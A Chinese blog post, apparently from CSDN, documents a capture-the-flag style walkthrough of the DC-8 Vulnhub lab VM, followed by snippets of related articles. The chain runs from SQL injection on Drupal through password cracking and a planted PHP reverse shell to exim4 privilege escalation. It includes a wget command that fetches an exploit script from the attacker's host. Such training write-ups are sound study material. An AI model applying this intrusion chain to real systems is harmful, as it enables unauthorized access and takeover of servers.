DC-8靶机实战

最新推荐文章于 2024-03-24 18:58:40 发布
最新推荐文章于 2024-03-24 18:58:40 发布
阅读量414 收藏 1
点赞数
分类专栏: DC 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackhackerzxcr/article/details/106759455
版权

DC-8靶机实战

nmap扫一下
主机发现
在这里插入图片描述
全扫描:
在这里插入图片描述
用drupal cms扫描器扫一下
在这里插入图片描述
7.67版本,卡得不上不下的,难搞喔
发现了存在php这个插件,如果能进到后台,执行一波php代码,反弹shell就好了

后面又是各种一顿扫,没有发现什么有用的,然后就去手动到网站找漏洞
后面遇到一个页面。以为有xml注入,结果尝试无果

最后找到了一个注入点
在这里插入图片描述
数字型注入,手工几下就拿到了users里面的admin 的口令和john 口令

john爆破了一下,admin的口令没有爆破出来,到是拿到john 口令

后台登录:
在这里插入图片描述
没有权限增加content,但能修改一个content
在这里插入图片描述
在这里插入图片描述
加入反弹shell代码,选择php code

然后到该页面填写提交,记得还是要填规范。不然报错也不会执行里面的反弹shell的
在这里插入图片描述
然后找提取的突破口
在这里插入图片描述
发现了exim4,看看版本
在这里插入图片描述
msf 精确搜索
在这里插入图片描述
选择本地权限提升的脚本
改成root.sh

看了一下内容,本地权限提升参数 -m netcat
kali打开http服务

下载到靶机
wget http://192.168.206.128:8000/root.sh
记得下载到可写目录

chmod +x root.sh
执行
在这里插入图片描述
出现了这个问题,脚本必须设置成unix

vim打开。set ff=unix
然后保存退出,再下载
执行

在这里插入图片描述

提权成功
在这里插入图片描述
读取flag

0XAXSDD
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-8靶机渗透
whylon的博客
07-26 432
DC-8靶机渗透 文章目录DC-8靶机渗透信息收集漏洞利用获得shell提权 请勿用文章中的手段进行违法攻击,做守法公民,利用文中手段造成不良行为后果本文作者概不负责 信息收集 首先发现存活主机 发现目标主机ip为192.168.11.132,我们的kali ip为192.168.11.129,现在我们探测敏感目录 使用dirsearch工具首先没安装的要安装 apt-get install dirsearch #安装dirsearch dirsearch -u "http://192.168.11.13
DC-8靶场
qq_49518993的博客
08-27 865
DC-8靶场
DC8靶场渗透流程(超详细)
m0_64583632的博客
04-12 598
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战
DC-8靶机进行渗透测试
zll___的博客
03-24 472
DC-8靶机进行渗透测试
DC-8靶机渗透测试
来日可期的博客
08-13 1601
综上所述,该命令使用 msfvenom 工具生成一个 PHP Meterpreter 反向 TCP Shell 的 payload。该 payload 将在攻击者指定的 IP 地址和端口上监听,并允许攻击者对受感染的系统进行远程控制。这个命令是使用 Metasploit Framework 中的 msfvenom 工具生成一个 PHP Meterpreter 反向 TCP Shell 的 payload,并将生成的代码保存到。在搜索页面的时候发现,页面中有一个可以上传php代码的地方。
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2102
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC靶机系列:DC-8
Ays.Ie的博客
02-28 261
本篇文章为DC系列第8个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
Neos的渗透测试靶机练习——DC-8
qq_38678845的博客
01-14 978
一次渗透测试练习
DC8靶机渗透测试(个人学习记录)
最新发布
m0_53806046的博客
03-24 1065
SUID位允许用户以文件所有者的身份执行文件,而不是以用户自己的权限执行。当一个文件设置了SUID位(4000)时,这意味着当用户执行该文件时,他们将以该文件的所有者身份执行,而不是以他们自己的用户身份执行。2>/dev/null:这部分是将标准错误(stderr)重定向到 /dev/null,这意味着任何错误消息(例如,无法访问的目录或文件)都会被忽略,不会显示在命令输出中。它是最常用的密码测试和破解程序之一,因为它将多个密码破解程序合并到一个软件包中,可以自动检测密码哈希类型,并包含可定制的破解器。
DC-3靶机渗透实战
0XAXSDD的博客
06-11 2672
DC-3靶机渗透 咱们速战速决!我尽量详细一点 打开靶机,nat模式,nmap主机发现,全扫描 80端口,joomla 框架,打开御剑扫描器扫到后台路径和README.txt文件 获得了版本 这个版本有个sql注入漏洞,直接找来payload验证一下 index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) 确实存在注入漏洞
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0XAXSDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值